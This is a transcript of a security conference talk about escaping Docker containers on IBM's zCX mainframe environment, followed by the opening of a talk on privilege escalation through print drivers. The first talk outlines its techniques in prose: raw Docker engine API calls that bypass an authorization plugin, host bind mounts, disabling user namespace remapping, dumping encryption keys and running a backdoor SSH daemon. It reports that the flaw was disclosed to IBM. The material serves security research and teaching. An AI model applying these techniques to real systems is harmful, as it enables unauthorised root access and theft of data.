Hi, I'm Ian. I do container things. Hi, I'm Chad. I do mainframe things. And we're here to tell you a story today about some things we did together. We both live in Minneapolis, Minnesota, which is a cold, dark place where it's winter six months out of the year. Minnesotan hackers spend their long winters stuck inside doing deep dives, studying ancient arcana, and getting good at deep magic, which lends itself well to weird specializations. And that's how we ended up here. It all began in spring 2019. Like many good things, it began with a shitpost. A person involved in Dumb-Offs said, Kubernetes is the next mainframe. So, of course, I tagged Chad and it said, what do you think? I'm not qualified to speak on mainframes. I'm about as qualified to speak on mainframes as I am on beekeeping. I think I've gotten a little better at it since. But anyway, a few days later. A few days after that shitpost, we met at a local con for the first time in person and talked about our niche specializations. The similarities and differences between them. Although our worlds don't usually overlap, the cultures are different, the timeline is different. Mainframes have been around since the 50s and Kubernetes have been around for like, what, six or seven days? Our approaches had some similarities and we both knew we had some knowledge in common. In the mainframe world, it's not uncommon to patch the systems maybe once, twice a year. And in the Dumb-Offs world, people do like multiple deploys a day. Culturally, it's really different. Dumb-Offs people are really open to new things, open source software, really excited about doing things quickly and doing new stuff. And mainframes, maybe not so much. No one would ever accuse the mainframe community of being excited about change. Fair enough. Both of us had experience pulling things off that other people said were completely impossible in our respective fields. We figured how to navigate in uncharted territory. We took apart technology without dedicated tooling and with little or no prior art. We did have some things in common though. We had shared knowledge at Linux hacking, which ended up becoming helpful for this project later. Because containers are made out of Linux features and mainframes use Unix file systems too. We jumped about whether or not we really could prove that guy wrong about Kubernetes being the next mainframe. But I didn't really think we would ever get to do our thing together, because, honestly, who puts containers on a mainframe? Well, joke was on me, because just a few months later, in fall 2019, IBM announced ZOS container extensions, which we will be referring to from here on out as ECX. So, we made it into a winter project. Joining forces and combining our very specific particular sets of skills, we were able to become the first people on the planet to escape a container on mainframe. And that was just getting started. This talk is about how we did that, to talk about friendship, collaboration, cross-disciplinary skill sharing, and figuring out how to escape containers on the moon. But first, a couple of things. It would violate the laws of physics and math to fit all of the technical background that I and myself have about our two niche disciplines into the amount of time that we have for this talk. However, we have not figured out how yet to do this, but we're making a lot of progress and we'll make a note of it for future talks. So, we're not doing that today. We encourage people that are interested in finding out more to check the resources in our reference sections, or if you're seeing this in person, come around and ask us a question. There's a lot of ways to attack this thing that we're not going to be covering today, but we reserve the right to not answer questions about those. If you're not here in person and you're watching this virtually an hour later, we're around the interwebs too. You could probably find us on Twitter. Probably Twitter, yeah. Speaking of which, we disclosed this to IBM, and IBM sent us a formal statement about it. To our knowledge, this is unprecedented, so we figured we would share it here. Great to have you. Yeah, I've disclosed vulnerabilities to IBM in the past, and friends of mine have also disclosed vulnerabilities to IBM specifically for System Z, and they never get talked about publicly. This is fantastic. I really appreciate this, and I hope they do this again in the future. So, yeah, that's pretty cool. Anyway, let's get to it. So, what is this thing? Containers on a mainframe? What? That's weird. First off, let's do some myth busting. Mainframes still exist. They're widely used, and the tech is more modern than you think. UNIX, or AIX, has been ported and running a mainframe since the early 90s, and now they're actual containers that run inside an address space on IBM's most prevalent mainframe OS, ZOS. Every one of you used a mainframe today, or in person, on the way here. If you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe. IBM's product name for this is ZCX. I'll explain what that is, but first, let's do some super basic mainframe primer. The mainframe we're talking and referring to today is IBM's flagship system Z. The operating system is known as ZOS, sometimes still called MPS by its old timers. It runs most of the mainframes on the planet, and it runs a unique architecture called Z architecture. Within this OS, the basic unit of user or process separation is known as an address space. ZCX is a custom hypervisor which emulates Z architecture and runs in its own address space on ZOS. Atop ZCX, there is a customized bare bones Linux image running Docker containers. IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers. So, Ian, what's a container? What is a container? First of all, let's talk about what it's not. A container is not the same thing as a virtual machine. Containers don't have their own kernels or standalone resources, at least most of the time. Containers share resources with each other and with their hosts. And unlike a virtual machine, if you kill a container process, you kill the entire container. Docker is the most common container engine, but it's not the only one, and they can vary pretty widely in implementation and behavior. Some of them even have hypervisors. ZCX does use Docker, though, so that's what we're going to be talking about today. This isn't the first time Docker containers have been run on mainframe computers. Docker has been running on bare metal Linux instances on mainframes for a minute, but that's just plain Linux. ZCX is different because it's the first time containers have been run on ZOS. But what is a container anyway? Well, a container isn't really a thing at all. They're basically a set of native Linux features that are put together in order to isolate a process. These features are C groups and namespaces. C groups determine what resources a process is permitted to use, like CPU and memory. Namespaces determine what a process is permitted to see, like directories and other processes. Together, C groups and namespaces make up what we call a container, which is really just an isolated process. Containers as a concept don't really exist in the Linux kernel. As far as the kernel is concerned, a container is no different than any other process running on the host. What this also means is that you can look at a container process like you could any other process on a Linux host. For this demo, we've already escaped to the ZCX host, so we're looking from there. So let's run a container with the name Honk command sleep 1312. The Honk isn't really necessary here. I just wanted to honk at you. If we list our containers, we can then see that container running. We can see this or any other container on the outside by running a PS command, which will show us containers running on the host alongside other processes. This command output will give you the process ID, the user running it, the PID namespace number, and the command line argument. If we want to take a look at the inside of the container, we can do so by looking at the proc NS folder for the process ID of that container. We found the PID of the container we just created in the PS command output we just ran. Let's take a closer look. We take a look here. We can see the C group at the top and the other namespaces on the bottom. All processes on X are made up of these namespaces as of kernel version 5.6. There's also a time namespace, but ZCX runs an old ass kernel. So this demo won't show you that one. Depending on the configuration and how the container was created. Some of these namespaces might be shared with the host and some might be unique to the container. We're not going to get into that here, but I recommend checking out the resources in the reference section to learn more. And that's it. Honestly, that might be the closest thing you're ever going to be able to get to being able to actually look at a container. Because that's all a container is a process made of a C groups and namespaces. Because containers do share resources with one another and their hosts containers present a wide and varied attack surface where if a container is compromised or misconfigured containers can compromise each other and their hosts. I just think they're neat. They're fun to break. So let's talk about breaking some. So how to break this thing. We approach ZCX from both ends using our respective knowledge and skill sets and we ended up taking ZCX completely apart from both the container side down into the mainframe and the mainframe side up into the containers. But first, before we did anything else, Chad set up a lab in the cloud. It's true. It was a complicated lab and it took a while to get it going. Let me explain. We had to build a cloud based ZOS environment with the latest ZCX code release. We used IBM's ZPDT that stands for Z Personal Development Tool. It's a virtualized platform that emulates Z hardware and runs a top Linux on top of the ZPDT. We loaded the newest ZOS version fully patched it and we're able to install and run ZCX in the cloud. So it looks a little bit like this. On top of Linux, which is a hosting provider, we run a Linux instance. Running in that Linux instance is ZPDT. On top of ZPDT hypervisor is ZOS. Within ZOS, there's an address space which runs the ZCX hypervisor. On top of that runs a Linux instance and in that runs Docker on Docker. And that's our research environment. Simple. Simple. Something along those lines, yeah. But to really be able to attack this, we needed to level up our skill sets. So we started out by cross-training each other. We set aside time to share skills and get each other up to speed and enough to be dangerous. Because for me, I didn't really know how to do anything with a mainframe. I couldn't spell Docker. But you could. And so we needed a little bit of help getting each other up to speed. So we started doing that. First thing, I took Chad's evil mainframe class. Chad's a really good teacher. It's a really good training. If you ever get the chance, I recommend it. It's, um, upward is such cons that you may or may not have heard of like Black Hat. Every once in a while. So the training is multiple days long. It goes over the history of mainframes, how everything works, and there's a CTF at the end. It was really good. I had a really good time at bed. Mainframes were brand new to me. I had never touched one before. I had never really had an occasion to. I'm used to bleeding edge cloud native text stacks. That old stuff never really comes into play for me at work. And while unit system services felt familiar enough, the older stuff was wild. I had never seen or dealt with architecture like that before. It was so foreign to me. It might as well have been made on the moon. I learned in systems. So it took me a little while longer to ramp up at first until I figured out how the whole thing worked together. Chad was very patient with this. I did get there eventually. I still call them mainframes though. Don't let Ian fool you. They picked up mainframes super fast, as good as anyone I've seen. The next thing was for me to train up on containers. And Ian helped me do the Secure Kubernetes CTF. I'd done only a little bit of work on Docker before, generally with CTFs and the like. It's always seemed like a little bit of magic to me. Working with Kubernetes and Dockers and the Secure Kubernetes CTF really helped me make some sense out of it. It did bring me back to my beginning mainframe days. I mean, this is complex and a really steep learning curve of a bunch of abstract concepts. I still put my overall understanding of Kubernetes at like 5% maybe, and containers somewhere in the neighborhood of maybe 30%. But working side by side with Ian has really helped me. They've always stopped to take the time to answer my questions, very detailed answers and examples. I definitely would not have wanted to embark on this without their guidance and patience. Don't let Chad fool you either. He took right to it because he already had a base of Linux knowledge and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast. It was really fun to watch. And it was really fun to get to come up with a curriculum to train you. Because I'm not a professional trainer. That wasn't really something I had done before. So it was cool to come up with one for you to teach everything. Or at least some of the things. Anyway, so after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product. Working together, but separately, we looked at our respective spaces. I looked at the containers. And I looked at the mainframes. And we tried to figure out how to get into it. On the mainframe end, I started with the initial provisioning of ZCX. This is where the primary image files live in the Unix subsystems on the mainframe. This is where you initiate ZCX, you provision it, and thus all of the artifacts that might be interesting to us are stored here. I uploaded these files used to build a root ZCX file system to a Linux box, and then I could take them apart with the proper tools. I fired up my exotic hacking tools like strings. I quickly discerned that the core of these images had two main parts, a whole bunch of bash scripts, and a bunch of Linux disk images. I extracted and examined these bash scripts alongside the job log, which shows messages as ZCX launches. Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up in the job log. What to do? Well, going back to the bash scripts, I looked and there was this super helpful line near the top of the first bootloader script that gave away the secret. Uncomment this line to enable debugging output. Thanks developers, who said being a hacker was difficult? All you have to do is just learn how to read. So I patched this binary, put it back on the mainframe, and repositioned a new ZCX. Fabulous. The job log spat out all the debug for all of the bootloader stages. There were so many messages, though, about keys and decryptions. My interest was peaked and the hunt was on. I patched the bash script up again and started looking for the initial decryption keys. I used the tried and true hacker skills of echo privatekey.pem, and I dumped the first of several encryption keys to the job log. However, I couldn't fully reverse the file system yet because despite being able to echo these keys in the initial bootloader processes to the job log, I couldn't actually find the keys in the file system. It's a pretty complex setup. So I could copy the keys one by one out of the job log, but this is a colossal pain in the ass. For the moment, I was stuck and I turned it back over to Ian. So looking at the container setup, I immediately saw some things that looked promising. First of all, the initial user was in the Docker group, which is a security hole so fundamental it literally comes with a warning label on every new install on ZOS. Somebody had to have seen this label and actively ignored it. Wow. Okay. So sweet. This looks good. Moving on. The container setup that ZCX has was Docker and Docker, which has known security holes, especially in certain configurations. There are a couple of approaches to Docker and Docker. It can mean running the Docker daemon inside a container, running inside another container, or it can mean running only the Docker CLI or the Docker SDK in a container and connecting it to the Docker daemon on the host. ZCX has a setup like the latter one. The approach to Docker and Docker that ZCX uses has a few different known drawbacks and some known security holes. Because in this setup, the container running the Docker CLI can manipulate any containers running on the host. It can, for example, remove containers. It can create privileged containers that allow equivalent access to the host. And ZCX Auth plugin, which was part of their security model, tried to account for this, but it didn't quite work entirely. Wait, what? I hadn't mentioned ZCX Auth plugin yet. What's up with this? Let's get there. So, I had looked at this and realized pretty quickly that it wasn't completely wide open. My first attempts of doing the sort of like most Bob standard, kind of like, okay, can I run a container as privileged in here? Can I execute a command as root? That kind of thing were blocked by this Docker authorization plugin that they were using called ZCX Auth plugin. ZCX Auth plugin did a few different things. Blocked for village containers, blocked executed commands as root. It also blocked mounting the host path as a read write by mount. Okay, fair enough. But I neither had to be a way to get into this because honestly, just look at that setup. And I wanted to figure out how the thing worked. So, as I do, I went to the box and as they often do, the box pointed the way. Quite literally, IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do, because they adversely affected security features or may compromise the product. Well then, thanks, IBM. I appreciate the tips. I was clearly going to have to try all of those immediately. The language and the docs at the time claimed that it was not possible to become root or access or modify the Linux host. But I knew that it was possible because they gave enough information away about their system to tell me so. Here's why. For one thing, what CCX off plugin blocks gave me very specific error messages. For another thing, the commands they were blocking through CCX off plugin were very specific, which pointed to a specific set of system configurations and also the possibility maybe that they might be blocking through pattern matching projects. Really? This was like trying to prevent SQL injections by banning the string or 1 equals 1. Without banning other things like, for example, and 1 equals 1, or, you know, parameterizing queries on the backend or anything else that 1 might do with SQL injections. Even if it is possible to prevent all attacks via trying to block known bad syntax, which I think most people here can probably guess that it's not, because there's not some ways to bypass that, it's also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant, and in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers. Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn't mount host resources. Okay, I already knew that the plugin tried to block that one. It also mentioned that VaRun Dockersock was read-only. Oh, that was the key to the front door. Let's talk about the Dockersockit for a minute. The Dockersockit is a known security hole if you leave it exposed to, for example, users in the Docker group. This gives that user root equivalent access to the host. And read-only for the Dockersockit is not a security boundary for a couple of reasons. One, you can make a whole volume read-only and all of the files in a folder read-only, and that doesn't actually affect sockets because sockets don't work that way. Also, the Dockersockit in particular has an API layer that you can make calls to and an entire Docker engine API for commands that you can execute to it while making those calls. And in the commands that the docs had mentioned blocking, they didn't mention any of the syntax around the engine API at all. So I made a curl call, creating a new container that mounted the host path as a read-write find map via engine syntax. And hey, the words! So I knew that making calls could work and that binds was an option they missed. Sweet! But when I tried shrooting out into the host system, it didn't quite work the way that I wanted it to, because they had enabled username space remapping. What this means for my purposes is that once I was out of that name space, even though it said I was root, I couldn't really do anything meaningful in that name space. And they had locked down the pseudo-respline real hard, which was throwing weird permissions errors that I haven't seen before. So that was kind of odd. But, okay, maybe this one wasn't going to work. But at this point, I knew I was getting somewhere. I'm going to take a second here to explain username space remapping, because it's important. Linux namespaces provide isolation for running processes. They limit their access to system resources without the running process being aware of the limitations. You don't want to run your containers as a root user generally. It is not a secure thing to do. But sometimes for various system reasons, you get a container in which something has to run as root. So for those containers whose processes have to run as the root user within the container, you can remap this user via user namespace remapping to a less privileged user on the Docker host. The mapped user is assigned a range of UIDs, which function within the namespace as normal UIDs from 0 to 6.5536, but they have no privileges on those machine itself. This was why, even though I was theoretically running as UID 0, I couldn't really get anywhere. So knowing that the API calls could work to the engine API, but that username space remapping was kind of cramp in my style, I figured I'd try something else. I tried a username space host option through the API, because setting username space to host breaks username space remapping. This option was blocked by the plugin when I had tried it before in a Docker run command, but via the API, it worked. And this time, when I got in, I had full root access to all of those resources. Wow. This system really needed more defensive depth. It appeared to have been built upon the assumption that no one could ever become root on the host, like they really believed their own propaganda. So nothing was really locked down on the backend by that point. Once you were in, and once you were root, you could really do whatever. And this kind of fun, actually. I haven't really had that much fun running around an environment since early Kubernetes, which was similarly locked down. And I haven't gotten to do that. So in a while, since Kubernetes improved, that was fun for me. Anyway, the first thing I did once I had access to the host file system was look inside the root folder, because, you know, why not? And in the root folder, there was another folder called root keys. Well, that sounded great. Obviously, there's going to be something interesting in root keys. So I took a look in there, and I found a private key called IBM encapsulation privatePAM. I didn't quite know what that was, but I figured probably you did. So I went and handed it to Chad, figuring it might be useful. Chad then took the key, reverse engineered the cobalt or something, and then we had a system to look at. Right. So it wasn't exactly cobalt, but it was pretty complex. So it was like a Fortran, right? Exactly. It was Fortran. Thank you. It was not Fortran. Ian had found the key that I was looking for. And once I had the key, I could finish reverse engineering the root file system, and then I was able to look at this in more depth. The root file system bootloader processes are a myriad of Luxe encrypted file systems, init rem file systems, wrapped encryption keys, and a whole bunch of scripts putting it all together. After parsing it all and reassembling the unencrypted file systems on my Linux box, I had a moment and realized what this was. This is IBM's secure service container, or as it used to be called, Z appliance container infrastructure, ZACI. IBM's secure service container is an offering that they sell for Linux, Linux one, where it runs directly on bare metal IBM mainframes as a secure appliance. The file systems were littered with these acronyms. It dawned on me that what they had done was taken this, and this is why there was this wild maze of keys and encryption and scripts. They lifted this SSC, which normally has its initial decryption keys inside of hardware service module, and poured the whole thing to software on a disk. IBM normally builds these hardware enclaves, but it's harder to do that in the cloud. As it turns out, you can't actually lift and shift things into the sky. What we were coming to find out is that the security model in ZCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways. Since container shares resources with each other and their hosts, securing for containers requires a holistic approach. Any given container system is only as secure as any given part of its stack, really every part of its stack. You have to have defense and depth in every layer on a container system. Containers are literally made out of layers, but that means that you not only do you need to, but that you can do every little bit at a time. This is somewhat different security model than about on a mainframe. The mainframe security model is really granular. You can configure security on literally anything on the mainframe. However, it's also a monolith in its security model, and it can be very binary, like a light switch. Defense and depth on the mainframe can be really difficult if you have made any security configuration errors that would allow you to basically bypass all the security controls because you screwed up one or two really key important things. Mainframes are wild. They are wild. So the differing approaches to these two security models came into play with the way that ZCX got built. And these two combined in some somewhat unexpected ways. And that way they got combined led to some somewhat unexpected behavior for both of us. So we worked together, passing things back and forth. When either of us ran into the limits of our knowledge or saw something that didn't really make sense in the respective context we were used to, we would pass the problem to the other person, who would recognize it from their knowledge and context. And then we would do it again. So, back to the container system. I'm in there. I have full root access, but I was having a hard time understanding some behavior that I was running into. The Docker service kept throwing these weird system D errors I hadn't seen before, and my debugging tools weren't really helping in helping me figure out why. I wasn't really sure what was up with this. Meanwhile, on the mainframe side of things, I found this directory in Etsy system D services had these weird permissions on it. 644, which any of you Linux people would know that 644 is kind of odd permissions for a directory because the execute bit isn't set. I found this because I was copying it from a Linux box to another directory, and my copy command threw an error because it couldn't copy that directory. Why would you want a non-executable directory? I'd never seen this before. I showed this to Ian with a comment about how strange I thought this was. Oh, huh. Okay. This partly explained the errors that I had been getting with the Docker service that I hadn't been able to figure out. Sort of. The permissions bit made sense in a container context. 644 are actually pretty standard permissions for the Docker service for compliance reasons. But this particular service didn't quite act the way that I would normally expect it to. The Docker service interacted with several other system D services. One of the services it was interacting with was called CCXoffplugin.service. So I took a look at that. I wanted to know how this plugin worked. And could we disable it? Docker authorization plugins aren't super commonly used, but the ones that I had seen, which were open source, generally behaved in pretty similar ways. This authorization plugin was different. It was closed source, and it interacted with system D as a service in a way that I hadn't seen before. It kept making these calls back and forth and running against a list of string matching text. What the fuck? This wasn't common behavior in container contexts at all. I had never seen such a thing. Ian explained this to me, and it occurred to me that what was going on here might have a similar corollary in the mainframe world. Specifically, mainframe exits. Let me explain. So within ZOS, there's a concept of an exit. What an exit is used for is if you want to do some really specific customization to some part of the system. An exit is literally a program that you write, usually an assembler or C, maybe C++, that is called from an API in some kind of a system routine. So the way it works is, let's take an example, a password processing routine. So Ian's going to change their password on the mainframe to Sparkle. So they type in the password Sparkle. The mainframe then says, okay, that's fine, but I see that there's an exit defined for password compliance. So it will call the program that I wrote, and in my program, the mainframe exit for password policy, I'm going to check all kinds of things. Is this word part of the dictionary list? Is it part of, is it the month? Is it the current year? Is it Ian's name? Things like that, that the system wouldn't normally check. And if it is okay, I'm going to pass back a return code that says, that's fine, Ian can you Sparkle? Or if it's not good, I'm going to say, no good, and I'm going to make them change their password back to something else. So I explained this to Ian. I said, I think what's happening here is that the programmers who know how to write exits to modify and control system behavior have written an exit in the ZCX auth plugin, and that's how they're trying to control the security of this product. Meanwhile, I was also looking at the ZCX auth plugin, but I was looking at the binary. And the first thing that I noticed was that it was huge. I mean, listen, normally on mainframes, things are built with like really tight assembly code or C code. The binaries, even for super complex mainframe systems are small. Because of this reason, take example of the nucleus on a mainframe, which is like kind of like the kernel, like the core bit that tells everybody what to do. It's maybe 50 mags on the mainframe. And the ZCX auth plugin is six mags. I started dumping it and looking at it with a hacksetter and a disassembler. And there's all kinds of calls in here to things that have nothing whatsoever to do with Docker or security. And I was like, what is going on here with this thing? So I called it back to Ian and I said, what is this? What's happening here? This is what I knew. It was a Go binary. There's a thing like that. They have a lot of dependencies. They make a lot of extra calls. That's normal for Go. At one point, I tried to Docker pull the image for Go-Tang and I crashed to our entire lab for disk space. Oops. I'm unfamiliar with these kinds of size constraints because I used to go. It's big. And so although I recognized the Go patterns in the code, that made sense to me. Some of what that code was doing looked kind of weird. It looked unfamiliar in a way that at this point I had learned to figure out, probably meant it was doing something kind of weirdly mainframe specific, despite the fact that it was a Go-length thing that I might otherwise be used to seeing. So at this point, I think we all knew this was clearly going to keep happening and we were going to need to get a deeper looking at system together. But to get into the systems deep as we wanted to, we were going to need persistence and tools. So we made a lab version of ZCX and we ripped out all the security features that IBM had left behind for us. We disabled the ZCX off plugin. We disabled user namespace equals remap. We made all of the read only mounts into read write mounts. We stored this file system onto a mainframe dataset. We added a debugger. We got apt up and running so we could update the software and install new applications and programs. And I even very proud of this figured out how to make SSH run on the root file system by copying the SSHB binaries and the corresponding libraries out of the Docker overlay file systems and running them in the root file system. So we had a direct factor into the root file system and could commence doing a little bit deeper research. We're still doing more with that. So where do we go from here? Well, we have a to do list. So we're still working on this project. We have a couple of obvious points to attack that we've already gathered some information about. And maybe some less obvious ones that we won't be talking about here. One of my favorite things is disassembling or reverse engineering code. So disassembling the ZCX off plugin is something that I'm absolutely looking forward to. However, it's written in Go and it's on an architecture using tools that were not really designed for that architecture. Let me explain. If you look at any of the open source tooling designed for mainframe, what you'll see is the architecture not listed as Z architecture, but listed as S390X architecture. They are the same thing in open source parlance S390X equals Z architecture. And even though I have things like optschdum and GDP and that sort of thing, when I disassemble these binaries, I'm going to end up with Z assembler code, not x86, not arm, but Z assembler code. So this is going to make it quite a bit more complicated to get through. But doing this, I think, is going to open up some obvious pointers to other security vulnerabilities. S390X architecture kept coming up and kept kind of throwing wrenches at things throughout this process because open source tooling sometimes supports S390X, but a lot of the time it doesn't. And honestly, for really valid reasons, open source developers, often who are working for free, are like, I don't work for IBM. Why would I work for something that is specific to IBM architecture? They're not paying me to do this. If you want people to do this, you can hire people to do this. And therefore, a lot of tools just aren't supported. That kept coming up as I kept running into like, okay, I'm going to go with this open source tool that I used to use it and having it be like, no, and have some sort of like terrible architecture failure like seven layers down the stack. It was kind of cool for learning and also paying the ass. Anyway, the real goal here for us would be a full hypervisor escape, which we believe can be done. CCX runs in an address space within ZOS, and that address space runs as authorized. Let me explain what this means. In a mainframe context, running as authorized means something specific. It's like security through the file system. So if you have a folder on Linux where anything that was in that folder automatically ran as UID0 as root, and not only that, it had root access to everything else in the system. That's actually how mainframe authorized address spaces work, which is wild. And what this means is that if we can get code execution in that address space, which frankly we believe that we can, we will be able to own the entire mainframe server, all of it, everything. We already know that there are direct memory links. IBM hopefully provided us this hideously ugly diagram in Comic Sans telling us so, and also we know because of this demo. Okay, just going to show you a quick demo on what we think might be possible in the future. We've done a little research on the shared memory links between CCX and ZOS. We know they exist. They're in some of the diagrams, and the documentation talks about it. But we found one of particular instance we'd like to show you now. So this demo is basically just giving you kind of a window into what might be possible by way of just kind of a fun demonstration. So if you log into our backdoor of our ZCX instance, so this is an SSH server that I booted up that's just running on the root level of the ZCX instance now, not bothering having to go back in through Docker and escape down to the root instance. We're just running an SSH daemon directly from it now to get in and out. It's part of our research environment. And I'm going to run some hackery commands from the CCX instance that I'm not going to show today. And just to give you an example of what we think is possible, let's log back into the mainframe system. So I'm going to go log in with my TSO ID onto our mainframe. And once I'm into TSO, I'm going to launch ISPF, which is kind of the green screen that everybody associates with mainframe, and is still probably the primary means of accessing the mainframe. And I'm going to go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named Moon, which is the ZCX server that we're looking at. So if I scroll down in this job log, and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in ZCX and my ability to write to memory inside of ZOS, placing the goose there at the end of that job log. So the demonstration here was basically just to show you that what we have is, what we have done is we've gone down through the Docker engine into the root Linux container, what's labeled here is Linux kernel, and that we know there are memory connections between that kernel through the ZCX hypervisor and to ZOS. And so our next project is really to try to figure out how to take advantage of that and do memory overwrites and gain access, then full access to an authorized address space within ZOS. Doing so would give us access to then all of the data, the programs and everything running on ZOS, which is ultimately the end goal. We couldn't wrap this up without discussing what we've learned. None of this or any of the future work that we will do would be possible without the sparkling partnership between Ian and myself. And I have to add a side note, but I think I've said sparkling in this talk more than I've ever said it in my entire life when I wasn't ordering a drink. It's all the glitter, right? That's right. It is indeed. There's a lot of glitter. Here's what I learned. In my niche world, I'm often the expert that people come to for input. I like this. I worked hard for it. I like the recognition that comes with this. I admit I find it hard to ask for help or admit that I don't really know where to start on a thing, especially if it's something that I could probably figure out on my own eventually, but maybe it would take me six months or a year. I don't know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you and being humble. This is hard. This is hard for me. And maybe it's hard for some of you, but it's been a really good experience. It's been really good for me. I like to encourage all of you watching this to do this too. Be vulnerable. Ask for help. Be humble. Even when it's hard. It's not only okay, but the outcome can and likely will be better than going it alone. I'd like to. I'm more used to asking for help. I work collaboratively a lot. I'm a member of a hacker crew called Seh Kank. So we work together all the time and admit when we don't know things and ask for help and do that a lot. So I was more used to that. What I wasn't used to was working with people who have a skill set that overlaps a little with mine. Because usually when I do collaborative work, I do it with other container people. And it's been really awesome to get to work with somebody who has knowledge that is so new to me and is so different from mine. I've gotten to learn so much from you and it's been great. And to me, I felt really inspired by that. I think we both have about what kinds of possibilities this could lead to for people. Because we don't always think about this, right? We hang out with people in our bubble. Maybe they do the same kind of things we do. Maybe they're a lot like us. And if we start working more closely with people who are really different from us, either in just their skill set or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that in a way that is really awesome. And if we all start doing that more, we can learn more from each other and we can build and break things more amazingly. And things that wouldn't have been possible before if we can work across like chasms in that way. So that's been really sweet. And we want to encourage you all to do that too. Because what can you do together? What can you build? What can you break? There are infinite possibilities. And we really want to see what you can do with that. We want to see what we often do with that. I don't think we do it as enough as in the industry. So, let's find each other. Let's make things happen. You and a small crew of committed friends can change the world. The secret is to really begin. Thank you. Thank you.
|
You've seen talks about container hacking. You've seen talks about mainframe hacking. But how often do you see them together? IBM decided to put containers on a mainframe, so a container hacker and a mainframe hacker decided to join forces and hack it. We became the first people on the planet to escape a container on a mainframe, and we’re going to show you how. Containers on a mainframe? For real. IBM zCX is a Docker environment running on a custom Linux hypervisor built atop z/OS - IBM’s mainframe operating system. Building this platform introduces mainframe environments to a new generation of cloud-native developers-and introduces new attack surfaces that weren’t there before. In this crossover episode, we’re going to talk about how two people with two very particular sets of skills went about breaking zCX in both directions, escaping containers into the mainframe host and spilling the secrets of the container implementation from the mainframe side. When two very different technologies get combined for the first time, the result is new shells nobody’s ever popped before. REFERENCES: Getting started with z/OS Container Extensions and Docker: https://www.redbooks.ibm.com/abstracts/sg248457.html The Path Less Traveled: Abusing Kubernetes Defaults: https://www.youtube.com/watch?v=HmoVSmTIOxM Attacking and Defending Kubernetes Clusters: A Guided Tour: https://securekubernetes.com Evil Mainframe penetration testing course :https://www.evilmainframe.com/ z/OS Unix System Services (USS): https://www.ibm.com/docs/en/zos/2.1.0?topic=system-basics-zos-unix-file z/OS Concepts: https://www.ibm.com/docs/en/zos-basic-skills?topic=zc-zos-operating-system-providing-virtual-environments-since-1960s Docker overview: https://docs.docker.com/get-started/overview/
|
10.5446/54213 (DOI)
|
Hello DefCon, welcome to my talk, bring your own print driver vulnerability. In this talk, I'll discuss how a standard low privilege user can install print drivers of their choosing by design on Windows systems. And I'll show how a local attacker can escalate to system using a handful of different print drivers. Now I want to say up front that I won't be talking about print nightmare. Print nightmare at this point is supposed to be a patch vulnerability, whereas what I'm going to talk about in this presentation is likely a built in feature that will be difficult to patch. I also had to record this shortly after print nightmare's release, so even if I wanted to incorporate it, there really just wasn't enough time. This talk is roughly broken down into four parts. To start, I'll discuss some research that influenced this talk. Then we'll explore how a standard user can install a print driver. Next, we'll discuss actual exploitation, and I'll introduce a tool I wrote. Finally, I'll touch on detecting the sort of attack in the wild and mitigations that may prevent it. I'll also give a quick rundown of the vulnerability disclosure timelines associated with this talk. Now my opinion, slides are just an educational tool. While it's all well and good for me to present them, it's also important for the viewer to read them at their own pace. Click links, read background material, and try out code snippets. There are also exploits associated with this talk, and because of all that, the code and slides are available at the following GitHub repository. The name of the repo will make a little bit more sense later on in the talk. Finally, before we get too far into it, I'd like to introduce myself. My name is Jake Baines, and I'm a vulnerability researcher. I like to use the handle albino lobster, which is why you'll see this little lobster almost everywhere I'm active online. My most well-known work is probably my micro tick work, although it isn't well known at all, but I have had the good fortune to be able to present at a few conferences, including DEF CON 27. I'm currently employed by Dregos. However, all the work I'm discussing today was done while I was employed by Dark Wolf Solutions in fall 2020. Dark Wolf very kindly gave me permission to share this work, for which I am truly grateful. So thank you very much to them. Now there are some researchers that cut their own path and break new ground, but I'm just not one of those people. To learn the printer subsystem and arrive at the conclusions I did, I had to stand on the shoulders of many more talented researchers that came before me. I think it's important and useful to understand the work that influenced my final outcome. So let's quickly discuss some previous printer vulnerabilities. The first issue I want to familiarize you with is CVE 2019-19363. This is a vulnerability in a third-party print driver. The driver was developed by RICO and it allows for privileged escalation to system by overriding a DLL. Integrate handled the disclosure and published a nice proof of concept, while Shelby Pace of Rapid 7 developed the Metasploit module. The good vulnerability, but the driver has to be installed on the system in order to exploit it. So it is sort of limited in that capacity. This is a good one to remember for later in the talk, as we will reference it again. Of course there is CVE 2020-48, which is better known as PrintDemon. Now it got a lengthy and a bit of a meandering right up on the Windows Internals blog, but if you spend some time with it, that blog provides really good exposure to some of the important WinAPI function calls associated with printers. The vulnerability itself allows a local attacker to print to arbitrary files as system after restarting the spooler, resulting in privileged escalation. The image here is actually from the VoidSec blog that talks about the vulnerability. And what you see is the UI rejecting the attack due to insufficient permissions. However, a similar call via the WinAPI was allowed, resulting in the vulnerability. And of course there was the patch bypass for PrintDemon, a variety of people were actually credited with this CVE, but VoidSec did the best write up in my opinion. This is a really simple attack where after the file permission checks have been done, the attacker just swaps the file port with a junction, and then they just execute the normal PrintDemon attack. Really just that easy. I like Rapid7's attacker KB because it's an easy way to get other attackers thoughts on vulnerabilities. As you can see, CVE 2021 through 3.7, still just a local privileged escalation is rated as very high. Finally, CVE 2020-1300 or Evil Printer was presented at DEFCON28 last year. Again, this is a local privileged escalation using the Printer subsystem, but this time when the CAB file delivered by a remote printer. ZDI wrote up some technical details about the CAB file, but other than Steven Sealy's tweet in November, I haven't seen anyone publish a full exploit for this one. Now I loved the DEFCON28 presentation, and it served as the jumping off point for my own research. And because Evil Printer was so important to me and my thought process, I want to spend a few minutes just walking through the attack in its entirety. The attack setup requires two things, a standard user account on a Windows machine, and an Evil Printer to serve up a malicious CAB file. The standard user simply uses the 